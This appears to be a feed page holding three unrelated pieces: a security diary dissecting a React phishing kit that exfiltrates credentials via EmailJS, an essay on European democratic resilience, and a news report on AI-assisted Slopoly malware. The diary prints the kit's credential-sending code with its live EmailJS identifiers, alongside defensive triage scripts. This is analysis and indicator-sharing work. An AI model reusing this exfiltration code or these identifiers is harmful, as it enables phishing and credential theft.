AnonymousMedia.org

    A React-based phishing page with credential exfiltration via EmailJS


    On Wednesday, a phishing message made its way into our handler inbox. It contained a fairly typical low-quality lure but turned out to be quite interesting nonetheless, because the accompanying credential-stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection.

    But before we get to the details, let’s take a quick look at the initial message. The e-mail pretended to be a notification about a list of files shared with us through the legitimate WeTransfer service.

    I mentioned that the lure used in the message was of low-quality because, as you can see in the following image, the files in question were supposedly sent by someone using our own e-mail address… Which would probably be at least a little suspicious to any recipient.

    The body of the message included a list of files that were supposedly part of the transfer – in total the message claimed that 76 items with a combined size of 1010 MB were shared with us (or with the intended victim, to be more general).

    Messages of this type are quite ubiquitous and the only reason why I decided to spend any time on this one was the link it contained. It pointed to the following URL:

    hxxps[:]//crimson-pine-6e12[.]gstmfhxzvbxk[.]workers[.]dev/?%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%[email protected]()Dropbox%20Community

    Embedding the recipient’s e-mail address in the query string is something we see fairly frequently in phishing campaigns, but the ending of the parameter string with “()Dropbox Community” caught my attention.

    Another small detail that somewhat stood out was the encoded portion at the beginning of the query parameter, which used percent-encoded UTF-8 byte sequences that did not correspond to standard ASCII characters.

    %D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%B0

    When decoded, the first characters correspond to Cyrillic letters, specifically:

    This appears to be a truncated fragment of the Russian word for a program:

    The reason for including this fragment is unclear, but it provides an indicator of the language the authors of the phishing might have spoken (since one wouldn’t expect any false-flag attempts in a generic phishing campaign such as this one).
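    As an added illustration (not part of the original diary), the following Python decodes the query string discussed above the way a handler would before opening the link: it percent-decodes the parameter as UTF-8, counts characters per Unicode script, pulls out the non-ASCII runs and any embedded e-mail address, and notes the workers.dev host. The percent-encoded prefix and the domain come from the diary; the recipient address in the sample is a constructed placeholder. The prefix decodes to the Cyrillic letters п, р, о, the digits 86, and г, р, а.

```python
import re
import unicodedata
from urllib.parse import unquote, urlsplit

# The percent-encoded prefix quoted in the diary, followed by a constructed
# tail that stands in for the recipient address the original link carried
# (the address below is a placeholder, not the real one).
SAMPLE_URL = (
    "https://crimson-pine-6e12.gstmfhxzvbxk.workers.dev/?"
    "%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%B0"
    "victim%40example.invalid()Dropbox%20Community"
)


def decode_query(url: str) -> str:
    """Percent-decode the raw query string as UTF-8.

    errors="replace" keeps a truncated multi-byte sequence from raising,
    which matters when a lure cuts a word in the middle of a character.
    """
    return unquote(urlsplit(url).query, encoding="utf-8", errors="replace")


def script_breakdown(text: str) -> dict:
    """Count characters per Unicode script name (ASCII kept separate)."""
    counts: dict = {}
    for ch in text:
        key = "ASCII" if ch.isascii() else unicodedata.name(ch, "UNKNOWN").split(" ")[0]
        counts[key] = counts.get(key, 0) + 1
    return counts


def non_ascii_runs(text: str) -> list:
    """Return maximal runs of non-ASCII characters, e.g. the Cyrillic fragments."""
    return re.findall(r"[^\x00-\x7f]+", text)


def embedded_addresses(text: str) -> list:
    """Find e-mail addresses carried in the decoded query (ASCII-only match)."""
    return re.findall(r"[A-Za-z0-9.+_-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+", text)


def triage_url(url: str) -> dict:
    """Summarise the indicators a handler would note before opening the link."""
    decoded = decode_query(url)
    return {
        "decoded_query": decoded,
        "scripts": script_breakdown(decoded),
        "non_ascii_runs": non_ascii_runs(decoded),
        "addresses": embedded_addresses(decoded),
        "workers_dev": urlsplit(url).hostname.endswith(".workers.dev"),
    }


if __name__ == "__main__":
    for key, value in triage_url(SAMPLE_URL).items():
        print(f"{key}: {value}")
```

    The script breakdown is the useful part for triage: a query parameter that mixes a Cyrillic fragment, an ASCII address and a brand name is unusual enough to be worth a closer look on its own, independent of the hosting domain.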

    As you may have noted, the link used in the message pointed to a Cloudflare Workers domain (workers.dev), which, apart from its legitimate use, has become a convenient hosting platform for short-lived malicious infrastructure in recent years[1,2].

    The link led to a fake Dropbox Transfer page showing what appeared to be a file download portal with a list of documents displayed over a looping video.

    Selecting any of the download options resulted in a login prompt requesting the user’s e-mail address and password before access to the files would (supposedly) be granted.

    While the user interface itself was fairly typical for a phishing page, its structure was somewhat more interesting.

    Inspecting the page source revealed that the HTML document was almost empty and consisted mainly of a single placeholder element together with a reference to a JavaScript bundle main.90eaa1b0.js (the additional hidden elements were unrelated to the visible interface and were likely artifacts of the phishing kit or simple attempts to evade automated scanning).

    (HTML source not preserved in this copy; the document title read “Dropbx - Collaboration Document”.)

    This indicated that the page was implemented as a single-page web application, with the interface rendered dynamically in the browser. This approach is much less common in phishing kits than static HTML pages and can somewhat complicate analysis if an analyst relies only on the landing page's source code.

    Opening the referenced JavaScript bundle confirmed the hypothesis and showed that the page was built using React[3], since it contained the React runtime together with the application code. Typical runtime identifiers appeared throughout the file, as you can see in the following image.

    The entire phishing interface was therefore rendered dynamically once the JavaScript bundle executed and attached itself to the root HTML element.

    The most interesting portion of the code appeared in the logic responsible for submitting the login form. The bundle contained a call to the EmailJS service[4], which allows web applications to send e-mails via its API directly from client-side JavaScript.

    The three following code fragments show the relevant functionality:

    1. Code responsible for sending a POST request to the EmailJS API
      
      const D={origin:"https://api.emailjs.com", ...}
      
      H=async function(e,t){
        ...
        const r=await fetch(D.origin+e,{method:"POST",headers:n,body:t}),
        ...
      }

    2. Definition of a routine that builds the POST request body
      
      X=async(e,t,n,r)=>{
        const l=F(r),
              a=l.publicKey||D.publicKey,
              ...
        ...
        f.append("lib_version","4.4.1"),
        f.append("service_id",e),
        f.append("template_id",t),
        f.append("user_id",a),
        H("/api/v1.0/email/send-form",f)
      }

    3. Code that supplies parameters for the POST request (strings inside this excerpt are EmailJS inputs – “service_t8yu1k1” is a service ID, “template_vszijae” is a template ID and the constant “e” contains a public API key)
      
      const e="Z2Y07-t9AET4hviRq";
      if(
        X("service_t8yu1k1","template_vszijae",r.current,{publicKey:e}).then((()=>{console.log("a")}),(e=>{console.log("e")})),
        ...
      )

    Using this code, any credentials entered by a victim would be collected and transmitted through the EmailJS API.

    It should further be mentioned that the JS code also queried the Geoapify IP information API[5] to gather geographic metadata about the victim, which was then intended to be sent to the attackers along with the harvested credentials.

    After the form submission the page would redirect the victim to the legitimate website (Dropbox), as is usual in similar circumstances.
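    As an added example (not code from the diary or from the phishing kit), the following Python shows how an analyst can triage a downloaded bundle for the pattern described above: it lists known third-party endpoints referenced in the script and extracts the EmailJS service ID, template ID and public key, resolving the one level of constant aliasing seen in the third fragment. The sample bundle below is constructed to mimic the quoted fragments; the identifiers in it are the ones listed under IoCs, everything else is made up.

```python
import re

# Constructed excerpt mimicking the minified bundle quoted in the diary.
# Only the EmailJS identifiers are real (see IoCs); the surrounding code is made up.
SAMPLE_BUNDLE = (
    'const D={origin:"https://api.emailjs.com",publicKey:void 0};'
    'const e="Z2Y07-t9AET4hviRq";'
    'X("service_t8yu1k1","template_vszijae",r.current,{publicKey:e})'
    '.then((()=>{console.log("a")}),(e=>{console.log("e")}));'
    'fetch("https://api.geoapify.com/v1/ipinfo?apiKey="+k)'
)

# Services that, when called from a login form, are worth flagging.
EXFIL_ENDPOINTS = {
    "api.emailjs.com": "EmailJS (client-side e-mail relay)",
    "api.geoapify.com": "Geoapify (IP geolocation)",
}


def find_third_party_endpoints(js: str) -> dict:
    """Map each known endpoint host found in the bundle to its description."""
    hosts = set(re.findall(r"https?://([a-z0-9.-]+)", js))
    return {h: EXFIL_ENDPOINTS[h] for h in hosts if h in EXFIL_ENDPOINTS}


def extract_emailjs_identifiers(js: str) -> dict:
    """Pull service_id, template_id and public key(s) from an EmailJS send call."""
    ids = {
        "service_id": re.findall(r'"(service_[A-Za-z0-9]+)"', js),
        "template_id": re.findall(r'"(template_[A-Za-z0-9]+)"', js),
    }
    keys = []
    # publicKey is either a string literal or an identifier; for an identifier,
    # look for a "const <name>=\"...\"" definition (one level of aliasing).
    for m in re.finditer(r'publicKey:\s*(?:"([^"]+)"|([A-Za-z_$][\w$]*))', js):
        if m.group(1):
            keys.append(m.group(1))
        else:
            const = re.search(r'const\s+' + re.escape(m.group(2)) + r'\s*=\s*"([^"]+)"', js)
            if const:
                keys.append(const.group(1))
    ids["public_key"] = keys
    return ids


def triage_bundle(js: str) -> dict:
    """Combine both checks; 'suspect' means an e-mail relay plus EmailJS IDs were found."""
    endpoints = find_third_party_endpoints(js)
    emailjs = extract_emailjs_identifiers(js)
    suspect = "api.emailjs.com" in endpoints and bool(emailjs["service_id"])
    return {"endpoints": endpoints, "emailjs": emailjs, "suspect": suspect}


if __name__ == "__main__":
    print(triage_bundle(SAMPLE_BUNDLE))
```

    The extracted service and template IDs are exactly what one would pass on in an abuse report to the service provider, which in a case like this is a more durable takedown path than blocking the short-lived workers.dev host.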

    Although the entire campaign is basically just a run-of-the-mill credential harvesting operation, the phishing kit used is quite interesting from a technical standpoint, both because the implementation as a React application bundled into a single JavaScript file can potentially evade simple security filters on web proxies that rely only on static HTML analysis, and because it uses a legitimate third-party service for credential exfiltration instead of attacker-controlled infrastructure.

    IoCs

    Phishing domain:

    crimson-pine-6e12.gstmfhxzvbxk.workers.dev

    EmailJS identifiers:

    service_t8yu1k1

    template_vszijae

    [1] https://developers.cloudflare.com/workers/

    [2] https://www.fortra.com/blog/cloudflare-pages-workers-domains-increasingly-abused-for-phishing

    [3] https://react.dev/

    [4] https://www.emailjs.com/docs/

    [5] https://www.geoapify.com/ip-geolocation-api/

    -----------

    Jan Kopriva

    LinkedIn

    Nettles Consulting

    03/13/2026
    Europe’s Approach to Defending Democracy Is Failing


    European democracy is being battered by multiple storms. Far-right parties are surging across the continent, authoritarian powers are menacing the democratic information space, and mainstream governments seem incapable of quelling popular frustration. And the European Union must now also contend with the perplexing oddity of a U.S. administration that is painting its democratic governments as the main global threat to democracy. The United States’ 2025 National Security Strategy unnervingly defended the illiberal parties that most clearly menace democracy, and going into 2026, the Trump administration has become even more unchained in its voracious provocations against Europe’s liberal order.

    This roiling sea of troubles has sparked intense political debate about what is needed to make European democracy more resilient. Even if overall levels of democracy in Europe have not worsened significantly over the last decade (Hungary being the one case of clear autocratization), the prospect of a more dramatic democratic collapse in the future is real.

    As problems pile up, the EU and individual governments have begun to explore policies to shore up the continent’s increasingly precarious democratic norms and institutions. The European Centre for Democratic Resilience was launched in February, and most European governments have introduced national strategies to defend democracy, as well.

    These policy responses have been slow to take shape over the last decade but are now gaining momentum and coming to dominate EU policy agendas. However, emerging European strategies misunderstand what is needed for effective democratic resilience, and their impact is likely to be harmful in many important ways. Europe’s democratic defense policies must not only counter threats coming from autocratic powers and radical right movements, but they must also work to reform and upgrade how democracy itself functions.



    Hundreds of people with U.K. and English flags throng in a street beneath gray clouds during a protest. About a dozen have climbed a statue of a lion, and they wave their flags in the air on top of it.

    Protesters during a far-right “Unite The Kingdom” rally in London on Sept. 13, 2025. Christopher Furlong/Getty Images

    The unsettling impact of anti-democratic influences has been particularly felt in the online information space, and it is there where European policies have strengthened most significantly. European governments have tightened their focus on foreign information manipulation and interference (FIMI) operations. The Centre for Democratic Resilience has a remit that focuses primarily on this issue, and the same is true of national governments’ democracy initiatives—the United Kingdom’s Defending Democracy Taskforce and its recently announced military intelligence body are prominent examples. European countries face the double-whammy challenge of protecting a democratic information space from Russian and Chinese intrusions while also fending off the spiraling U.S. assault on the EU’s digital rules.

    However, democratic resilience strategies need to focus on other problems to at least the same intensity. European democracy cannot be comprehensively defended through formal standards and exchanges on best practices for online election standards or internet laws—which is what passes for most democracy strategy at present.

    Neither can it be improved simply by asserting tough European autonomy from the United States and other powers, however necessary it might be for other reasons. Due to the geopolitical context, much debate has atrophied into calls for European autonomy. But this line does not help in determining how Europe should use such independence to revive its democracy.

    That’s because efforts to control specific types of information manipulation address the symptoms rather than the underlying distortions of information ecosystems. Online controls are necessary, but they cannot tackle the root causes of why certain information flows carry disproportionate and unaccountable power and why citizens are so susceptible to such distorted accounts. If malign online influences have gained traction, then that is a result of democratic corrosion as much as the cause—the very opposite of the logic that is hardwired into current European approaches.

    The EU’s regulatory-oriented pathway amounts to what might be termed “resilience without politics.” It needs to give way to a much more political approach to democratic resistance. Current European approaches downplay the essentially political issues that need addressing if democracy is to work better for all citizens. Properly understood, democratic resilience is not a matter of simply rebuffing threats—whether from Russia, China, or the United States—but about improving democratic practices through qualitative political renewal.

    Much of Europe’s democratic malaise is endogenous to democracy, not external.

    At root, European democracies are so brittle because of their governments’ own nefarious dysfunctionalities and the structural power imbalances that sustain them. On this score, the EU has registered little progress and even exhibits a certain resistance to contemplating the ambitious change that is needed.

    Many emerging policies center on mitigating polarization as the main dynamic that has corroded European democracy. Leaders’ speeches tend to suggest that saving democracy is a matter of rebuilding consensus and “the center holding.” Yet, again, this kind of bromide unduly depoliticizes democratic resilience. While the anti-democratic impact of extremist parties clearly needs to be contained, democracy protection cannot be reduced to consensual centrism. If anything, it requires more open and critical politics.

    Polarization germinates in political systems’ failure to prevent a wide enough range of policy options that are fully responsive to citizens’ concerns. This was clear during the eurozone crisis when rival parties offered relatively similar economic templates and new governments often assumed power with negligible change to substantive policies.

    Effective democratic resilience ultimately requires a revived spirit of contestation and pluralism. And this needs to be facilitated and supported through very specific and tailored political measures.

    As much of the threat to European democracy comes from challenger political parties, EU resilience strategies need to help revive and reshape party systems. However, virtually no European effort or funding goes to this issue. Resilience is not just a matter of containing radical right parties but of more deeply changing the way that parties interact with citizens and the way that they decide their manifestos, and of crafting less hierarchical forms of party organization. The same is true of parliaments: They have lost leverage in most European states, but EU policy offers little to redress this trend.

    Democracy strategies also need to be aware of the ways in which societies are mobilizing to protest against illiberal regimes and threats. But the EU has refrained from offering unequivocal support to protests in member states like Hungary, Bulgaria, Greece, and Slovakia or in candidate states like Serbia and Georgia. Indeed, the EU has generally been ambivalent over these revolts and tends to call blandly for even-handed restraint from regimes and protestors in such cases.


    A small group of demonstrators stand on a street at night, with two of them holding a sign with the EU flag logo and the word “Help” at the center of its yellow stars.

    A demonstration against the state television network in Budapest, Hungary, on Nov. 4, 2022. Attila Kisbenedek/AFP via Getty Images

    This leaves a curious disjuncture. The EU rightly bears down on Russian and Chinese FIMI operations—and indeed those increasingly coming from U.S. illiberal networks—that are designed to turn people against democracy. But when there is ample evidence on the streets that European citizens do believe in democracy and are acting in its name, they get little support from the EU itself. Indeed, national governments have even sought to curtail such popular mobilization in the last several years. This betrays European governments’ tendency to conceive democracy in technocratic terms—as a system to be carefully guided and managed—and to downplay the catalytic role of citizen-led, pluralistic contestation.

    The European level of politics also needs to be considered: A pressing source of citizens’ disenfranchisement comes from the transfer of powers from the national to the EU level without commensurate democratic accountability. This structural feature of European integration is as much of a challenge as Russian or MAGA online manipulation. This does not mean slowing or undoing EU integration—indeed, deeper cooperation between governments is clearly essential to defending democracy, and Europeans need to push back more firmly against the Trump administration’s declared hostility to the EU’s very existence. But democratic resilience does require the European project to democratize itself.

    The current European framing of democratic resilience almost willfully ignores this factor. The EU and its member states talk ritually about the need to engage citizens but do relatively little to follow through on this. The European Commission and some member states now run citizen panels and assemblies, but the need goes well beyond these valuable initiatives and requires a sweeping effort at more inclusive democracy across many levels and actors. Citizens, community groups, and the many civic organizations working on democratic renewal need tangible influence over policies through processes institutionalized in formal EU decision-making, which is well beyond the cosmetic and heavily curated civil society forums that currently exist. The EU should more wholeheartedly back innovative means of transnational citizen engagement—like pan-European democracy movements and assemblies—that differ from the nation-state template of representative democracy.

    An emerging position in EU debates is that liberals need to “fight fire with fire” through hardball tactics against illiberal forces—and especially those driven by U.S.-led MAGA networks. That is, they need to move from defense to offense. Examples include emerging legal actions in several European states, particularly Germany and France, against far-right parties and politicians. Across Europe, there are growing calls for liberal lawfare against illiberal lawfare, tactics to weaken illiberal groups in the same way that illiberal regimes now restrict liberal civil society, and other such confrontational moves.

    The EU must strike a balance here. While democratic resilience strategies certainly need to be more assertive against the radical right, they should be cautious in using laws and institutional processes to engineer highly instrumental outcomes. European liberals must not conflate defending democracy with defending their own position against illiberal challengers. Even if the Trump administration’s charges against Europe’s supposedly undemocratic liberalism and free speech restrictions are clearly disingenuous, European democracy strategies do need to speak much more directly to this thorny question. Policies need to clearly define red lines that should not be crossed in the use of illiberal means to defend liberal politics. Democracy’s long-term prospects will suffer if many feel that legal actions against illiberals infringe on due process or that civil society funding rules are biased.



    Ursula von der Leyen and leaders from Slovenia, Hungary, Croatia, Portugal, Belgium, and Luxembourg stand around in an otherwise empty meeting room, chatting. Some of them lean against a nearby desk.

    European Commission President Ursula von der Leyen (center) stands surrounded by leaders from Slovenia, Hungary, Croatia, Portugal, Belgium, and Luxembourg at an EU Council Informal Leaders’ Meeting in Brussels on June 17, 2024. Pier Marco Tacca/Getty Images

    In all this, European responses are still moving too slowly and hesitantly. The Centre for Democratic Resilience is immersed in much technical preparatory work. European countries have been suffering democratic erosion for nearly 20 years. The EU needed a strategy for democratic resilience many years ago. If effective resilience is in part preemptive, then this tardiness augurs ill for future European strategy.

    Combined, this all points to the need for a full-spectrum democratic resilience that can turn the tide against the radical right’s disquieting political illiberalism. For now, European attempts at democratic resilience are planted in shallow soil. The shock of U.S. President Donald Trump’s illiberal onslaught catalyzed some modest new EU democracy commitments in 2025, within and beyond Europe. However, much stronger political commitment, boldness, and innovation will be needed if these are to grow into a sturdier approach to defending and deepening European democracy. And this is not a parochial matter: Europe’s experience in democratic resilience will inform and condition efforts in other regions to push back against this era’s illiberal tide.



    03/13/2026
    Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks


    Ravie Lakshmanan, Mar 12, 2026, Artificial Intelligence / Malware

    Cybersecurity researchers have disclosed details of a suspected artificial intelligence (AI)-generated malware codenamed Slopoly put to use by a financially motivated threat actor named Hive0163.

    “Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take,” IBM X-Force researcher Golo Mühr said in a report shared with The Hacker News.

    Hive0163’s operations are driven by extortion through large-scale data exfiltration and ransomware. The e-crime group is primarily associated with a wide range of malicious tools, including NodeSnake, Interlock RAT, JunkFiction loader, and Interlock ransomware.

    In one ransomware attack observed by the company in early 2026, the threat actor deployed Slopoly during the post-exploitation phase in order to maintain persistent access to the compromised server for more than a week.

    Slopoly’s discovery can be traced back to a PowerShell script that’s likely deployed by means of a builder, which also established persistence via a scheduled task called “Runtime Broker.”

    There are signs that the malware was developed with the help of an as-yet-undetermined large language model (LLM). This includes the presence of extensive comments, logging, error handling, and accurately named variables. The comments also describe the script as a “Polymorphic C2 Persistence Client,” indicating that it’s part of a command-and-control (C2) framework.

    “However, the script does not possess any advanced techniques and can hardly be considered polymorphic, since it’s unable to modify its own code during execution,” Mühr noted. “The builder may, however, generate new clients with different randomized configuration values and function names, which is standard practice among malware builders.”

    The PowerShell script functions as a full-fledged backdoor that can beacon a heartbeat message containing system information to a C2 server every 30 seconds, poll for a new command every 50 seconds, execute it via “cmd.exe,” and relay the results back to the server. The exact nature of the commands run on the compromised network is currently unknown.
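    Fixed-interval beaconing of the kind described above (a heartbeat every 30 seconds, a command poll every 50 seconds) is one of the more reliable things to hunt for on the network side, regardless of how the client was written. The following Python is an added example, not code from the report or from IBM X-Force: it groups proxy requests by source host and destination, measures the gaps between them, and flags pairs whose timing has almost no jitter. The log lines are constructed; the hosts and addresses in them are placeholders.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: timestamp, source host, destination, path.
# ws-017 calls the same destination every ~30 s; ws-042 browses irregularly.
SAMPLE_LOG = """\
2026-03-02T10:00:00 ws-017 203.0.113.10 /hb
2026-03-02T10:00:30 ws-017 203.0.113.10 /hb
2026-03-02T10:01:01 ws-017 203.0.113.10 /hb
2026-03-02T10:01:30 ws-017 203.0.113.10 /hb
2026-03-02T10:02:00 ws-017 203.0.113.10 /hb
2026-03-02T10:02:31 ws-017 203.0.113.10 /hb
2026-03-02T10:00:05 ws-042 198.51.100.7 /index.html
2026-03-02T10:00:09 ws-042 198.51.100.7 /style.css
2026-03-02T10:03:40 ws-042 198.51.100.7 /news
2026-03-02T10:11:02 ws-042 198.51.100.7 /about
2026-03-02T10:11:03 ws-042 198.51.100.7 /logo.png
"""


def parse_log(text: str) -> dict:
    """Group request timestamps by (source host, destination)."""
    series = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _path = line.split()
        series[(src, dst)].append(datetime.fromisoformat(ts))
    return series


def beacon_score(timestamps: list):
    """Return (median gap in seconds, jitter ratio) or None if too few requests.

    The jitter ratio is the median absolute deviation of the gaps divided by
    the median gap; machine-driven timers give values close to zero, while
    human browsing gives values near or above one.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return None
    med = statistics.median(gaps)
    mad = statistics.median([abs(g - med) for g in gaps])
    return med, (mad / med if med else float("inf"))


def find_beacons(text: str, max_jitter: float = 0.1, min_requests: int = 5) -> list:
    """List (source, destination, median interval) pairs that look like beacons."""
    hits = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_requests:
            continue
        score = beacon_score(stamps)
        if score and score[1] <= max_jitter:
            hits.append((src, dst, round(score[0], 1)))
    return hits


if __name__ == "__main__":
    for src, dst, interval in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}: periodic every {interval}s")
```

    A real deployment would run this over a longer window and whitelist known agents (update checkers, monitoring), which also beacon on fixed timers; the point of the jitter ratio is to separate those fixed timers from ordinary browsing, not to identify malware on its own.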

    The attack in itself is said to have leveraged the ClickFix social engineering tactic to trick a victim into running a PowerShell command, which then downloads NodeSnake, a known malware attributed to Hive0163. A first-stage component, NodeSnake, is designed to run shell commands, establish persistence, and retrieve and launch a wider malware framework referred to as Interlock RAT.

    Hive0163 has a track record of employing ClickFix and malvertising for initial access. Another method the threat actor uses to establish a foothold is by relying on initial access brokers such as TA569 (aka SocGholish) and TAG-124 (aka KongTuke and LandUpdate808). 

    Interlock RAT has multiple implementations in PowerShell, PHP, C/C++, Java, and JavaScript to support both Windows and Linux. Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads, such as Interlock ransomware and Slopoly.

    The emergence of Slopoly adds to a growing list of AI-assisted malware, which also includes VoidLink and PromptSpy, highlighting how bad actors are using the technology to accelerate malware development and scale their operations.

    “The introduction of AI-generated malware does not pose a new or sophisticated threat from a technical standpoint,” IBM X-Force said. “It disproportionately enables threat actors by reducing the time an operator needs to develop and execute an attack.”



    03/12/2026